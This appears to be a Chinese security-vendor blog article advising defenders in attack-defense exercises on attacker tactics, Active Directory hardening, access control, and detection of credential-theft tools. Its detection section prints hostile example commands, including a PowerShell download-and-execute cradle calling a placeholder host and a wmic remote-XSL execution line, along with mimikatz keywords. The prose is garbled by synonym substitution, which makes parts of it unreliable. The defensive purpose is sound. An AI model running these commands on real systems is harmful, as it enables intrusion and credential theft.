复检浸透测验网站安全攻守项目剖析

2020-06-27


复检浸透测验网站安全攻守项目剖析


短视频,自媒体,达人种草一站效劳

最近我们Sinesafe参加的几家组织的浸透测验防卫方防护方案评价复查,部分防卫方缺乏对攻击者的正确认知,攻击者的手法现已比较高超了,不扫描,不落地,污染日志等都很普及了。同时也要正确认知对手:攻防演练中,攻击者并不是无所事事,他们面对着和防御方一样的问题:时间紧,使命重。所以攻击者的攻击方针,攻击手法也是有迹可循的,知己知彼才干攻无不克。

浸透测验

一、知彼

攻击者也是讲本钱的,因此防卫方最好的策略是:做的比其他防卫方好一点点即可。好一点的意义:不在初级问题上犯错(弱密码、互联网应用长途RCE、管理后台暴露、重要效劳器未打补丁等)。关于 时间紧、使命重 的防卫方来说,建筑铜墙铁壁的防线显然意味着大本钱投入,以及最紧缺的时间,因此本文不会八面玲珑,只选择性价比高值得快速投入的安全措施和我们共享。

攻击者一般:方针明确、过程明晰、控制本钱、反检测,反整理、三流分立。

方针明确:攻击者只攻击得分项,和必要途径(外网进口,内网安身点),对这些方针采纳高级级手法,会隐蔽操作;对非必要途径顺路控制下来的效劳器,其实不怕被发现,用起来比较随意,乃至主动制造噪音,搅扰防卫方。

过程明晰:信息收集-控制进口-横向移动-维持权限-攻击方针体系。每一步都是经典操作和教科书式手法。

控制本钱:

优先攻击高权限账号,如管理员,方针体系负责人账号;

优先攻击运维/安全人员账号和终端,这些人往往有效劳器root账号,安全设备办理员账号,可以进一步深化控制;

优先攻击集中管控设备,如域控,集中身份认证体系,终端办理体系,攻陷单体系即取得公司内大部分体系的权限;

优先攻击根底设施,如DNS,DHCP,邮件体系,常识共享平台,oa体系,工单体系;这些体系有内置高权限账号,或可以协助攻击者隐蔽痕迹。或Git/SVN等开发源代码办理效劳器,通过代码审计发现应用0day缝隙。

反检测,反

样本隐蔽技能(白使用(带微软签名的程序履行未签名的黑dll),样本不落地履行(从网上加载样本,只运转在内存,不落盘不惊动杀软));

快速分散(攻击者会将攻击包做成主动化东西,下降人力投入,快速控制一批有缝隙发效劳器);

停止日志外发,日志清除(脚本优先停止常见日志外发东西;同时有开源主动化东西来绑架日志发生的进程,使得体系不发生日志;使用完后删除aess.log等日志);

减少扫描,通过火析日志、分析装备文件、管理员来历IP等方式来获取内网的其他机器IP信息,而不是扫描。

点击添加图片描述(最多60个字)

三流分立:

扫描流:用来大批量扫描内网存活IP和缝隙,扫描源通常不被攻击者注重,被清除也不会影响到攻击方案,高水平攻击者通常使用扫描行为来涣散防卫方精力。

数据流:用来向外网很多传输非要害数据,通常是有互联网权限的终端或效劳器(终端较多),很少有隧道行为或扫描行为,通过简略的s,sftp方式传输数据

操控流:用于承受和传递远控指令的效劳器,攻击者最注重的设备,使用起来最为慎重,和远控中心进行交流,常用组件cobaltstrike, empire;有隧道行为,且数据传输量很少,会连接若干个IP和域名(防止外网封禁),传输必定加密,不使用自签名证书。

在本次攻防实战演习准备阶段,攻击方准备了几十个C2域名。

二、知己知己,主要是知晓防卫方防卫区域内的财物信息,缩小暴出面。原则如下:

不用的体系,该下的下,该暂停的暂停。不用的功用,该下的下,该暂停的暂停。(平时就应该这样处理,而不是战时)

该撤销拜访的撤销,能限制拜访规模的限制拜访规模。

在用的,搞清楚功用,双流(数据流和运维流)谁用,有无危险,能否一键处置。

缩小暴出面 1.按财物所属纬度梳理

互联网财物、分支组织财物、子公司财物、外联公司财物、公有云财物、开发商、外包商。

容易忽视的:

公有云财物,因为有的事务部分和分支组织公有云请求都不通过IT部分,上面却放了很多事务数据。

开发商/外包商的财物。开发商/外包商一般给甲方外包开发信息体系,开发商/外包商公司内部也会自建Git/SVN等源代码办理效劳器,存有现已交给给甲方的信息体系源码,而开发商/外包商的源码体系办理安万能力和甲方相比可能就差几个量级了。成果就是:通过取得的源码,发现体系运用0day,从而控制甲方已上线信息体系。

缩小暴出面 2.按财物属性梳理

特别重视财物的安全属性:中心件或框架(版本)、开放在公网API接口(特别是未下线的老接口)、管理后台开放在公网、高危功用(文件上传点、短信验证码、重置暗码、文件下载)、长途接入点(VPN)、特权账户(运用办理特权账户、应用连接账户、体系办理特权账户、可以修正账户权限的账户、备份账户、高管层账户)。

每个安全属性都是血的教训。

缩小暴出面 3.忽视点

所有内部文档效劳器上(含OA、邮件体系、jira、wiki、常识库等)灵敏信息整理或限制拜访权限,不要有:网络拓扑、安全防护方案和布置方位、各类密码;

财物管理平台上,蜜罐不要叫蜜罐、安全设备IP要隐藏;

各类口令:弱口令、默许口令、已泄露口令。

每个忽视点都是眼泪的结晶。

安全财物管理,更多内容参加:安全财物管理中容易被忽视的几点

三、防护要害点

临战前,再想依照大而全的梳理一遍,几无可能,最好就是把防护要害点过一遍,切记都实践看一遍,不要相信他人的反馈。

3.1 安全阻隔

浸透测验绕过

从实战来看,网络层的拜访操控被证明是最有用的(攻击者很难绕以前),不要相信运用层控制。网络层拜访操控属于根底架构安全,这是最有用最重要的,整个安全防护的基础。

拜访操控策略原则:明细允许,默许回绝。

从内网去互联网的拜访操控

办公终端:除单个协议无法限制意图IP外,其余协议悉数限制。特殊拜访需求,快速注册。有条件的考虑:终端不能直接拜访互联网,需要拜访互联网的两种处理计划:另外分配一台上网终端、虚拟阅读器

办公效劳器:特殊拜访需求注册,默许回绝

出产网:出产网终端禁止上互联网、效劳器特殊拜访需求注册,默许回绝

2.互联网拜访内网:对互联网提供效劳的效劳器有必要在DMZ,和内网阻隔。

3.重要体系的拜访操控策略

根底设施如AD、邮件体系的拜访操控。

别小看根底设施ACL拜访操控,这是对抗应用和体系缝隙的最低本钱和最有用措施。缝隙层出不穷,唯有ACL拜访操控药效耐久,强烈引荐。

终端安全管控、主动化运维体系等会集操控体系后台登录限制拜访来历。(优先使用网络拜访控制、其次使用体系层限制、搭配使用运用层限制)

3.2 AD防护

准备阶段

2.加固阶段

对抗权限提高:对域账号进行权限DACL梳理,加固高权限账号

检测高权限账号可以用bloodhound黑客东西监测,也能够通过System Internal Tools的ADExplorer来进行检测:

1)修正暗码(建议在演习前临近时间进行修正)

2)调整权限和分组,依据账号的归属人的权限进行调账,撤销非域管账号的灵敏权限。

3)修正分组内的不适宜的人员账号。

4)灵敏账号不允许委派。

5)灵敏账号不允许撤销Kerberos预鉴权。

6)灵敏账号的暗码强度契合规则。

7)具备直接域管或者直接域管权限(例如可以修正Domain Admins的账号就具备直接域管权限)的账号的活动进行报备准则,演习期间未经允许不得进行任何操作,包括登录等等。

8)办公机和终端演习前悉数重启,消除灵敏账号凭据留存。

9)效劳器登录查看相关凭据,假如有删除或通过刊出来删除效劳器上留存的凭据。

10)参照docs.microsoft/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-f--securing-domain-admins-groups-in-active-directory装备域管理员权限。

对抗攻击者使用MS14-068,MS17-010攻击域:从旧到新顺次装置DC上的windows补丁。

对抗攻击者使用ExchangeSSRF缝隙:从旧到新顺次装置Exchange上的windows补丁。

对抗LDAP relay攻击:在域控上装备LDAP enforce signing。

对抗LDAP relay和SSRF攻击:在域控上装备LDAPS channel binding。

对抗LLMNR/NBT Poisoning攻击:关闭域内WPAD效劳。

3.检测阶段

浸透测验检测阶段

原则:若域不安全,最佳修复方案是重装。

检测灵敏同享目录拜访:拜访了AD效劳器的非正常同享目录 (非SYSVOL文件夹)

检测mimikatz一系列攻击行为:

Mimikatz通过sysmon进程来进行检测,常见要害字有 gentilkiwi (Benjamin DELPY) (公司名称)、

其他要害字:kerberos::golden sekurlsa::pth kerberos::ptt lsadump::dcshadow lsadump::dcsync sekurlsa::logonpasswords privilege::debug misc::skeleton

检测Kerberos弱加密办法:非AES加密办法的Kerberos收据加密请求适当可疑

检测异常注册表变更和dump:DSRMAdminLogonBehavior

变更AdminSDHolder

导出HKLM\SAM内容

导出HKLM\SYSTEM内容

导出HKLM\SECURITY内容

检测ntdsutil滥用:使用了ntdsutil的灵敏参数activate instance ntds ;使用了ntdsutil的灵敏参数set dsrm password

检测SID history变更:账号加入SID History成功、失败

检测lazagne密码提取东西:特征 lazagne

攻击者喜欢用的其他东西:

procdump、PsExec、cain、Mshta、cmstp、QuarkPwDump、getpass、gethash、ntdsdump、Get-PassHashes、Wce、psaattack。

3.3 主机防护(终端和效劳器)对抗

攻击者在尝试控制终端和效劳器时,为了绕过常规的杀毒软件,通常会使用一些免杀手法。而某些免杀手法(如白使用,样本不落地履行)因为十分安稳和高效,更是遭到广阔攻击者的喜爱。

1.Powershell IEX组建下载履行.(文件在内存履行,不落硬盘)

使用代码示例:powershell.exe -nop -whidden -c IEX ((new-object.webclient).downloadstring('x.x.x.x:81/aa'))"

监测特征:"IEX AND (New-Object Net.WebClient).DownloadString

2.Windows体系白文件使用(wmic.exe

使用代码示例:cmd/c wmic os get /format: \\x.x.x.x\1.xsl start/wait notepad

监测特征:"wmic os get" AND "/format"3.Windows体系白文件使用(csc.exe)

使用代码示例:

"C:/Windows/Microsoft.NET/Framework64/v2.0.50727/csc.exe"/noconfig /fullpaths@"C:/Users/a/AppData/Local/Temp/l1xso2zu.cmdline"

监测特征:"csc.exe" AND ("/r:System.EnterpriseServices.dll"OR "/unsafe")4.Windows体系白文件使用(msiexec.exe)

特征:被动履行后台履行的参数,有一定误报率。请自行研讨,不再举例。

5.检测certutil白使用

特征:常见绕防火墙使用的参数。请自行研讨,不再举例。

6.检测通过url.dll来进行不落地履行

请自行研讨,不再举例。

3.4 账户和权限对抗

高权限一概整理,限制使用规模,每次使用后确认。

运用权限通过日志剖析检测滥用。

重视备份账户、可修正权限账户的使用。

终端24小时重启一次。(对抗终端权限抓取类攻击)

3.5 瞬间逝世

瞬间逝世有两种方式:途径打穿、体系打穿。

3.5.1 途径打穿

直接从未想过(未设防)的途径攻击过来。邮件是控制终端第一选择进口,详细防护可拜见《企业安全建设指南:金融职业安全架构与技能时间》第16章:邮件安全。

边缘网包括无线和自助终端,包括:打卡机、主动售卖机、会议室设备、ATM机、排队机等。限制无线和自助终端网络和内网拜访。

限制分支组织、外联公司等网络和总部的网络拜访。

不要相信理论上不能全通,但实践上存在全通内网的体系。(死于便利性)

3.5.2 体系打穿

体系打穿,都是血泪史。因为我们总是忘掉了这些最大的危险源。优先攻击中心化的体系和跨两网的体系,包括终端安全管控控制台(控制台安全防护才能很弱)、运维办理体系/Zabbix/Nagios/堡垒机等、单点登录SSO体系、AD活动目录;

优先攻击根底设施:DNS、DHCP、邮件体系、研制效劳器SVN/Git;

高价值终端:

网络办理员:终端内有网络拓扑和ACL操控战略,乃至可以修正拜访操控;

安全办理员:有安全防护方案和检测体系、告警体系登录权限,很多安全体系做了登录来历限制,绕过手法之一就是控制安全办理员的终端,同时抓取安全办理员账户密码,攻击者一箭双雕;

研制个人终端/运维个人终端:高价值数据;

内网扫描器:网络权限较大,哪都能去。

代码效劳器:代码数据价值比较高。私有协议开发的运用程序,源码要保护好,有经历攻击团队带代码审计技能成员,通过源码审计发现应用0day

3.6 容易出问题的点

互联网运用结构RCE

应用和中心件管理后台暴露

VPN:未启用双因素,或存在未启用双因素的部分用户

查验环境的测试体系未及时打补丁、弱密码

通过邮件进口控制办公终端

跨两网的设备

效劳器密码同责问题

社工

四、事中和事后

前面共享了很多防护和检测的事项,但防卫方到了这个阶段,更重要的是考虑一下事中的各种过载信息的研判和快速应急处置措施。

我们打内部攻防演习的时分,最大的困扰是决策和处置。

4.1 过载信息研判

有用高速的决策机制,什么权限规模内的由什么人决策,这是授权。

什么岗位(人)负责什么,这是职责划分。比如谁负责跟踪每条告警信息到Closed状态?谁负责断网?谁负责样本分析?谁负责失陷主机排查?谁负责溯源途径?谁负责记载?谁负责报告?等等。

4.2 快速应急处置

4.2.1 硬件和后勤

大的作战室,容纳悉数防卫部队;

好的白板(最好电子的),便于梳理攻击途径;

准备好零食和每日三餐、行军床。

4.2.2 重要信息同步

现已沦亡的IP清单(黑名单),同步给所有防卫方;

是否C2域名快速判断,留意真假难辨的域名。

4.2.3 各类应急处置措施

断网:快速断网的操作标准和主动化东西

钓饵

暂时添加ACL和FW规则

下线事务:和事务方建立疏通的交流机制和快速的决策机制

假如失陷(疑似)主机,决策用于钓饵,务必确保钓饵的危险可控,万一继续使用钓饵在内网横向移动,再进行限制就困难了。

留意膂力分配,高水平攻击者通常使用扫描行为等方式来涣散防卫方精力。

4.3 浸透测验复检

攻防实战演习后的总结改善提高,才是最终意图。

4.3.1 防护单薄点和改善措施

安全团队

协作团队

厂商和第三方

安全团队欠好推进的工作,欠好讲的话,要不到的资源,都可以在这里提出来。

应急处置单薄点和改善措施,落实到人、方案和资源中,才是务实的。

4.3.3 资源不足,要资源

安全运营是必经之路,拜见 金融业企业安全建设之路

7*24小时的安全运营,既然攻击对手是7*24小时的,为何安全运营不是呢?

4.3.4 必要的管理层报告

五、留意事项

不要影响事务。攻防演习前的加固,需要妥善评价对事务可用性影响,攻防演习中的应急处置,需要妥善评价对事务可用性影响,毕竟,事务可用性才是老大,安全不是,摆正心态和方位,假如对浸透测验有主见的朋友可以找专业的网站安全公司来处了解决,国内引荐Sinesafe,绿盟,启明星斗,等等的网站安全公司。




扫描二维码分享到微信

在线咨询
联系电话

400-888-8866